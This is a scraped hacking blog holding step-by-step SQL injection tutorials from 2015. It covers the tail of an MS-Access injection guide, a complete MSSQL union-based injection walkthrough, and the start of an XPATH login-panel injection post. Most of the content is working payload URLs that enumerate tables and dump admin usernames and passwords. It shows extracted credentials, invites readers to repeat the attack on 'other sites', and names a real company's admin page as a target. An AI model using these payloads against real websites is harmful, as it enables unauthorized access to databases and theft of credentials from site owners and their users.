<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Sbuj3-fjZ6py3AVppiF4OrtRM1v5MZXYy5378BE3BKHVd6YqnhLGndDNPVxMjllcWQk-sIxbP7d9MG4rEXzKSQ955R9U_7IfKOjDhwPO_E3uzysdqv6GsX6YhpR7k4FLTPC2JOJTBWLd/s1600/MS-Acces+Injection+-Tutorial+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Sbuj3-fjZ6py3AVppiF4OrtRM1v5MZXYy5378BE3BKHVd6YqnhLGndDNPVxMjllcWQk-sIxbP7d9MG4rEXzKSQ955R9U_7IfKOjDhwPO_E3uzysdqv6GsX6YhpR7k4FLTPC2JOJTBWLd/s400/MS-Acces+Injection+-Tutorial+7.png" title="MS-Access Injection -Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e10'</span></b></span>
<br />
<span style="color: red; font-size: small;"><b><span style="font-family: Arial;">No value given for one or more required parameters.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">it Meas this Column is not exist. Let's Try Another.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,login_id,4,5,6,7,8 from admin;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><b>Still The Same Error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">When we Put <b>Username </b>Column the Error is Gone.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,username,4,5,6,7,8 from admin;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qy16lAoYtYIGKVnL48_PLIqDfmWUO90LGUdH5BVBZO67V-dH1_aVqZfjGDYw7y-vpDZKO5iGNsp_j7ChWA9yrODtd5eb-8d8vBD44GTkrnyM07w35yAoRMbpLFLZ0Mkw3EJLzrCld4z2/s1600/MS-Acces+Injection+-Tutorial+8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qy16lAoYtYIGKVnL48_PLIqDfmWUO90LGUdH5BVBZO67V-dH1_aVqZfjGDYw7y-vpDZKO5iGNsp_j7ChWA9yrODtd5eb-8d8vBD44GTkrnyM07w35yAoRMbpLFLZ0Mkw3EJLzrCld4z2/s400/MS-Acces+Injection+-Tutorial+8.png" title="MS-Access Injection -Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">So it gives us <b>Username:<span class="testo1">01775IO5</span></b></span><br />
<span class="testo1" style="font-size: small;">Now Let's Guess column of Admin Password.</span><br />
<span class="testo1" style="font-size: small;"> </span><span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;">And the Column <b>Password </b>is also exist there.<b> </b></span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,password,4,5,6,7,8 from admin;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCYPeu4pLrYcV44a449Hs6bxOsVpeEVh1wG1yKiEIgiGwJExtgQe6Detx7prXxvNYnAQFs6Tce70sHV7qOQ-1c54jOqBPTXFiTeWSFZIxyVnbvzKOtN8s-sP-V7Lkyg4ecVrJUjFwAq00/s1600/MS-Access+Injection+-Tutorial+9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCYPeu4pLrYcV44a449Hs6bxOsVpeEVh1wG1yKiEIgiGwJExtgQe6Detx7prXxvNYnAQFs6Tce70sHV7qOQ-1c54jOqBPTXFiTeWSFZIxyVnbvzKOtN8s-sP-V7Lkyg4ecVrJUjFwAq00/s400/MS-Access+Injection+-Tutorial+9.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">it Gives us<b> Password=<span class="testo1">"bEx0Th6</span></b></span><br />
<span class="testo1" style="font-size: small;">So we will do the same for other sites to injecting into database.</span><span style="font-size: small;"><b><span class="testo1"> </span></b></span><br />
<span style="font-size: small;"><b><span class="testo1"><span style="color: magenta;">Hap</span><span style="color: #e06666;">py</span> <span style="color: #660000;">Inje</span><span style="color: #134f5c;">cting</span> <span style="color: #a2c4c9;">!!</span></span></b></span><br />
<b><span class="testo1" style="font-size: small;"><span style="color: #a2c4c9;"><span style="color: black;">AUTHOR:</span></span></span><span class="testo1" style="font-size: small;"><span style="color: #a2c4c9;"><span style="color: black;">Rai Muzammal Hussain a.k.a RAi Jee</span></span></span><span class="testo1"><span style="color: #a2c4c9;"> </span></span></b>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-31715386785221117002015-07-19T06:52:00.002-07:002015-08-17T08:56:36.728-07:00MSSQL Union Based Injection -Step by Step Guide<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX5xkYzdLW-6lPnln2N6L2OU_5YcjPwQr7gqbYImbvzKcZEPl9Mu2mSy8ahwMI4h2mmI2Caupiy4xlb8pJT_UGH1OBzrga-2UsLLtlByuxiTuJ3-Jcr6tOx9F_L-ywlxpc0aoAIGh-1Prw/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+www.raijee1337.blogspot.com+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX5xkYzdLW-6lPnln2N6L2OU_5YcjPwQr7gqbYImbvzKcZEPl9Mu2mSy8ahwMI4h2mmI2Caupiy4xlb8pJT_UGH1OBzrga-2UsLLtlByuxiTuJ3-Jcr6tOx9F_L-ywlxpc0aoAIGh-1Prw/s320/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+www.raijee1337.blogspot.com+1.png" title="MSSQL Union Based Injection -Step by Step Guide" width="320" /></a></span></div>
<span style="font-size: small;">In our Previous Tutorials we Have Discuss about MySQL and a lot of Methods of Injecting In MySQL Database.Now Let's Come To injecting MSSQL Database.</span><br />
<span style="font-size: small;">In this Tutorial we Will Discuss About MSSQL Union Based injection.Although MSSQL injection is Similiar to MySQL but Not The Same As MySQL Is Easy than MSSQL Injection.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">So Let's Start Our injecting.</span><br />
<span style="font-size: small;">We have a Target site .First we Have to Check if It's Vulnerable To MSSQL injection or not.For This Purpose we Will add single Quote ' at the end of the Parameter.</span><br />
<span style="font-size: small;">Here Let us Say Our Target site is and Add Single Quote ' at the End to check the Vulnerability:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing The Command with single Quote It Gives This Type of Error :</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5bZ8fJEV62e3k6jPlPWk9paTZ89BZfTimU7E1Ht_5PpIySMDKOoV9GbxFsAkd9NtJDh3KO0hqM4Z_V2RKR-icMAEQCIFVucBq7RHrZ2TrFU8IYWCUagcsZuxXiTVN3ZW84yPkNEvDYC7M/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5bZ8fJEV62e3k6jPlPWk9paTZ89BZfTimU7E1Ht_5PpIySMDKOoV9GbxFsAkd9NtJDh3KO0hqM4Z_V2RKR-icMAEQCIFVucBq7RHrZ2TrFU8IYWCUagcsZuxXiTVN3ZW84yPkNEvDYC7M/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+1.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">ERROR:</span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for SQL Server</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Unclosed quotation mark after the character string ''.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/news.asp</span><span style="font-family: Arial;">, line 9</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">So it Mean Our Target Site is Vulnerable To MSSQL injection.</span><br />
<span style="font-family: Arial; font-size: small;">Next we Have to Balance Our Query.Here are Some Comments that we Can Apply on our Target Site: </span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10-- Loading Fine !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10--+ Loading Fine !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10%23 Loading Fine !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10; Loading Fine !</b></span><br />
<span style="font-size: small;"><b><br /></b>
So as You know That Each Site Has Different WAF so use there Different Comments for Balancing The Query.</span><br />
<span style="font-size: small;">After balancing The Query now Next we Have to Count Columns.So we Will Normally use ORDER BY command For counting Columns Purpose.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 1--+ Site Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 5--+ Again Site Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 15--+ Again Site Loaded Normally and there is no any kind of error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 16--+ Here we have Got Error !!</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaeWtHbtEBiDa76HIre13jYHj8OtQbJJO3N3oCLJirfGiarnDpaEysrNOPh0Tg2_VKvVQ6u5Cfx_TwAbnNFnCk1Fr-3qahTlIXdSJ-aOSjcdtaR5TqolNAspCVbJ-jeUMINLoorLsDE4nE/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaeWtHbtEBiDa76HIre13jYHj8OtQbJJO3N3oCLJirfGiarnDpaEysrNOPh0Tg2_VKvVQ6u5Cfx_TwAbnNFnCk1Fr-3qahTlIXdSJ-aOSjcdtaR5TqolNAspCVbJ-jeUMINLoorLsDE4nE/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+2.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><b> Error:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for SQL Server</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">The ORDER BY position number 16 is out of range of the number of items in the select list.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/news.asp</span><span style="font-family: Arial;">, line 9</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">So It Means There are </span><span style="font-size: small;"><b><span style="font-family: Arial;">15 </span></b><span style="font-family: Arial;">Total Columns.Now Let's Prepare Our UNION BASED Command.For Finding The Vulnerable Columns we have to False the URL.</span></span><br />
<span style="font-family: Arial; font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After Executing the UNION BASED command you can see the Vulnerable Columns Printed on the WebPage.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis9WE4OPOnTy6xc4oO0x5fjRBcqbwD968AdPv2mIgr5bpyATmBBvUHGsXD5JIsqEDMLi8u5P-1Bw4T4awY7FGIMCwjJZVjgSNR_lbnn9DzgOfhZKe9n4fYsLovKxlLTj5oIpdd3VGYMLZH/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis9WE4OPOnTy6xc4oO0x5fjRBcqbwD968AdPv2mIgr5bpyATmBBvUHGsXD5JIsqEDMLi8u5P-1Bw4T4awY7FGIMCwjJZVjgSNR_lbnn9DzgOfhZKe9n4fYsLovKxlLTj5oIpdd3VGYMLZH/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+3.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"> in my case 5,6,7,8,9 are vulnerable Columns there.</span><br />
<span style="font-size: small;">So Now Let's Check The Version . for Finding The Version we will use @@version.We cannot use Version() here As it Is MSSQL Database Not MySQL Database.</span><br />
<span style="font-size: small;">Let's Give Command For Checking The Version:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After Executing the Query you can See the Version Printed on The WebPage:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMkAvqpJ4wrbTQzjj1zXNBEWBJmFtm7jw6MDMS1sQoFkL4JK5pgw4bI9tl8T8VTORceR4fA025vyN9hfGCErfgoOFrCKV3DYd0WNo6oY1Lyre5KQcFeMgfBNCZ05zWhQhRHEt3hyphenhyphenck0PZQ/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMkAvqpJ4wrbTQzjj1zXNBEWBJmFtm7jw6MDMS1sQoFkL4JK5pgw4bI9tl8T8VTORceR4fA025vyN9hfGCErfgoOFrCKV3DYd0WNo6oY1Lyre5KQcFeMgfBNCZ05zWhQhRHEt3hyphenhyphenck0PZQ/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+4.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><b> Version:</b></span><br />
<span style="font-size: small;"><b>Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Express Edition with Advanced Services (64-bit) on Windows NT 6.2 (Build 9200: ) (Hypervisor) </b></span><br />
<span style="font-size: small;">Now Let's Check The current Database Name<b>. </b>so for this we will Give command <b>db_name()</b> in the Vulnerable Column.</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+</b></span><br />
<span style="font-size: small;">and after executing this Command<b> </b>you can see the Database Name Printed Out there .</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3WRl0qp13S_8oO9CN9GfN-gta3ynGKzgLn_Euel4alwumPvHl0u7GFioTHv3__rDUOpcfsigPLZOxBWSqeNtvFugnWu6yaKgnKALv5nlsi1UEGCKCUI5ePbqmMYFLXDMk2ghtJSJX8LsW/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3WRl0qp13S_8oO9CN9GfN-gta3ynGKzgLn_Euel4alwumPvHl0u7GFioTHv3__rDUOpcfsigPLZOxBWSqeNtvFugnWu6yaKgnKALv5nlsi1UEGCKCUI5ePbqmMYFLXDMk2ghtJSJX8LsW/s640/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+10.png" title="MSSQL Union Based Injection -Step by Step Guide" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Database Name:</b></span><br />
<span style="font-size: small;"><b>bietdb</b></span><br />
<span style="font-size: small;"><b>Here Are some other Functions and There Uses:</b></span><br />
<span style="font-size: small;"><b>USES : FUCTION</b></span><br />
<span style="font-size: small;"><b>@@version Current Version</b></span><br />
<span style="font-size: small;"><b>db_name() : Current Database name</b></span><br />
<span style="font-size: small;"><b>System_user : Current User name</b></span><br />
<span style="font-size: small;"><b>User_name() : Current User name</b></span><br />
<span style="font-size: small;"><b>current_user() : Current User name</b></span><br />
<span style="font-size: small;">Now Next Part Is to get the Tables from the Database.As We cannot use group_concat Here therefore We Have to Get the Tables One by One.So this one Will Be Our Query for Getting The Tables.</span><br />
<!-- adsense -->
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+</b></span><br />
<span style="font-size: small;">And You can See the First Table name Printed There.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjToJmKHCmwHf8CsmDQDyoQMc4wMxrzHt1KJlTrL0XjjGhf823LoEtlCLMFeaFC66p7gSKjTZxvMvesP7hVlB-uR2MIY169QOZ683up-UGIwHP9XJcHTunJVWCGthfq9qDmP2PfXhUmpb4c/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjToJmKHCmwHf8CsmDQDyoQMc4wMxrzHt1KJlTrL0XjjGhf823LoEtlCLMFeaFC66p7gSKjTZxvMvesP7hVlB-uR2MIY169QOZ683up-UGIwHP9XJcHTunJVWCGthfq9qDmP2PfXhUmpb4c/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+9.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">So <b>Admin </b>is the First Table Name Here .But If you want To Get The other Tables then use this One Query.</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT
1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from
information_schema.tables <span style="color: red;">where table_name not in ('<span style="color: lime;">admin</span>')</span>--+</b></span><br />
<span style="font-size: small;">In this<b> Red Part </b>we will add our Previous Table name to get the Next one.We Will Continue to do so until Get the table That We Want.</span><br />
<span style="font-size: small;">Remember That every Table Name must be in small brackets and being enclosed by Single Quotes As You Can See This one query.</span><br />
<span style="font-size: small;"><b><span style="color: red;">where table_name not in ('<span style="color: lime;">Previous_Table_name_1</span>','<span style="color: lime;">Previous_Table_name_2</span>')</span></b></span><br />
<span style="color: red; font-size: small;"><span style="color: black;">So Let's Execute This Query For Getting other Tables in the Database.</span></span><br />
<span style="font-size: small;">so Here is our Second Table in the Database.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx39EcI0qOWKSLJzZ-XxpIC5pUFD6dIoh1N2yhfP1yyyQxJwwe_izjlImXqzgCgjt0_8VuhYW3UL_r0GEpgRmE4sGHaYso6ScBxr0ACInBFOoV-fq_Gj0CdgSiIIcKiNe3RvYrzxDj-8ne/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx39EcI0qOWKSLJzZ-XxpIC5pUFD6dIoh1N2yhfP1yyyQxJwwe_izjlImXqzgCgjt0_8VuhYW3UL_r0GEpgRmE4sGHaYso6ScBxr0ACInBFOoV-fq_Gj0CdgSiIIcKiNe3RvYrzxDj-8ne/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+8.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Let's Get the Columns From the Tables.So this one Will be our Query for the Columns.</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin')--+</b></span><br />
<span style="font-size: small;">After Executing this Query you can see The First Column name .</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY9NwB14UbHtNiqfd1n3vHhMqAvnei8-Pad3q2b31h0v5gexkyED1KcNJeTrwXqnx3h_c1jypzkFFm4KVf0TIOqz1-0I2C6q__4Ih_VczZikKSrVqLT8V4EWrakQZiknUMKMBmI8sDA_PS/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY9NwB14UbHtNiqfd1n3vHhMqAvnei8-Pad3q2b31h0v5gexkyED1KcNJeTrwXqnx3h_c1jypzkFFm4KVf0TIOqz1-0I2C6q__4Ih_VczZikKSrVqLT8V4EWrakQZiknUMKMBmI8sDA_PS/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+11.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">This is First Column in that Table.Let's Get the Other Columns from that Table.So for This Purpose we will use This Query.</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT
1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from
information_schema.columns where table_name=('admin') <span style="color: red;">and columns_name not in ('emp_name')</span>--+</b></span><br />
<span style="font-size: small;">in The RED Part we have to add Previous Column Name To Get the Next one as we Done This For Getting the TABLES.SO You Can Do it until You get that column name which you want.</span><br />
<span style="font-size: small;">So Let's Execute this Query to Get the other Columns.</span><br />
<span style="font-size: small;">You can see the Next Column name Printed there.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr5R3DFf_PTxmvMK4JhvLkZTemukUYn_P4HeDvqGZGuYTzmky1BDvqjHOoB1yu8TwFxkTpZbSKre2cEWSfWiEdhJEoi0C99G8gwC1rJOHOf9ZW6flFqYuBdXx-kVz-nYPexe3zyHNMGEw5/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr5R3DFf_PTxmvMK4JhvLkZTemukUYn_P4HeDvqGZGuYTzmky1BDvqjHOoB1yu8TwFxkTpZbSKre2cEWSfWiEdhJEoi0C99G8gwC1rJOHOf9ZW6flFqYuBdXx-kVz-nYPexe3zyHNMGEw5/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+12.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">As We Have Get the Columns Name Now Let's Extract data from them.As we Cannot use group_concat in MSSQL so Will Use <b>+ Encoded Value</b> with <b>Single Quotes</b>. So Our Final Query For Extracting Data From The Columns will be:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT
1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiud_yl3D23fUZhVsPYf0WiWGg-8eXpDCoUNJ5tTXBH8_Hnrz1_3FG2ECBMjQRyMVmnEYcppHvZmRC2l79B5aC-5SVszB4vOtYPyysnpK2BrQTRSirgo54WYvqwxZ7jgx1O3U79b2R4dUqy/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiud_yl3D23fUZhVsPYf0WiWGg-8eXpDCoUNJ5tTXBH8_Hnrz1_3FG2ECBMjQRyMVmnEYcppHvZmRC2l79B5aC-5SVszB4vOtYPyysnpK2BrQTRSirgo54WYvqwxZ7jgx1O3U79b2R4dUqy/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+13.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><b> </b>And After Executing The Query you can see the username and Password Printed in the above Picture.</span><br />
<span style="font-size: small;">You can do the Same Procedure for Extracting Data from other columns.</span><br />
<span style="color: #b4a7d6; font-size: small;">HAP<span style="color: #990000;">P</span></span><span style="color: #990000; font-size: small;">Y</span><span style="font-size: small;"> <span style="color: magenta;">INJE</span><span style="color: #e06666;">CTIN</span><span style="color: #bf9000;">G</span> <span style="color: #274e13;">!!</span></span><br />
<span style="font-size: small;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-46702822082604203712015-07-17T07:22:00.001-07:002015-08-17T08:54:29.953-07:00XPATH Injection in Login Panel<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhnMTH-58YrU55y48EjXzDfFp7s59e0oHLYCl6gKcY1t0ZzPzjigX7ODJcPlxrOr0UMuyXcPuwzsyQuYPevrdz6rt_aq8cAVHeAuZW6GwJkK1qWwVJdklviuSANL1LHOrJZ3psTab_rM4O/s1600/XPATH+Injection+in+login+panel+www.raijee1337.blogspot.com+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhnMTH-58YrU55y48EjXzDfFp7s59e0oHLYCl6gKcY1t0ZzPzjigX7ODJcPlxrOr0UMuyXcPuwzsyQuYPevrdz6rt_aq8cAVHeAuZW6GwJkK1qWwVJdklviuSANL1LHOrJZ3psTab_rM4O/s1600/XPATH+Injection+in+login+panel+www.raijee1337.blogspot.com+tutorial.png" title="XPATH Injection in Login Panel" /></a></span></div>
<span style="font-size: small;">In Our Previous Tutorial we have Discuss about <a href="http://www.raijee1337.blogspot.com/2015/07/bypassing-login-panel-with-sql-queries.html" target="_blank">Bypassing Login Panel With SQL Queries</a></span><br />
<span style="font-size: small;">But some Times when we Found SQL injection Vulnerability In Login Panel And after Executing SQL Queries There, it doesn't Give Access To the login Panel.So in SUCH cases we Will Inject The Login Panel With XPATH injection and dump admin Details from Login Panel.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">So we Will Start our Manually SQL Injection.as we are injecting through POST Parameters so we need LIVE HTTP HEADERS Addon for Executing Post Parameters In Login Panel.</span><br />
<span style="font-size: small;">Here is The Target site:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.almoayedgroup.com/admin</b></span><br />
